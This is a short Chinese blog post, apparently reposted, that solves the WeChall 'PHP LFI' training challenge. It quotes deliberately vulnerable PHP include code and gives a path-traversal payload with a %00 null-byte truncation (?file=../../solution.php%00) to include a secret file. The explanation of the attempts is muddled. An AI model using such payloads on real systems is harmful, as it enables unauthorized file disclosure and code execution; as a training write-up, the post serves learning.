WeChall_Training: PHP LFI (Exploit, PHP, Training)

标签：

Your mission is to exploit this code, which has obviously an LFI vulnerability:

1
2

$filename = ‘pages/‘.(isset($_GET["file"])?$_GET["file"]:"welcome").‘.html‘;
include $filename;

There is a lot of important stuff in ../solution.php, so please include and execute this file for us.

Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums

For debugging purposes, you may look at the whole source again, also as highlighted version.

解题：

　　因为字符串后面加了个".html"，完全不知道怎么处理，去搜了题解，发现可以用%00来截断，然后就试了下?file=../../solution.php%00，发现不存在这个文件，看了题解发现是?file=../../solution.php%00。。

WeChall_Training: PHP LFI (Exploit, PHP, Training)

标签：

原文地址：http://www.cnblogs.com/zhurb/p/5853831.html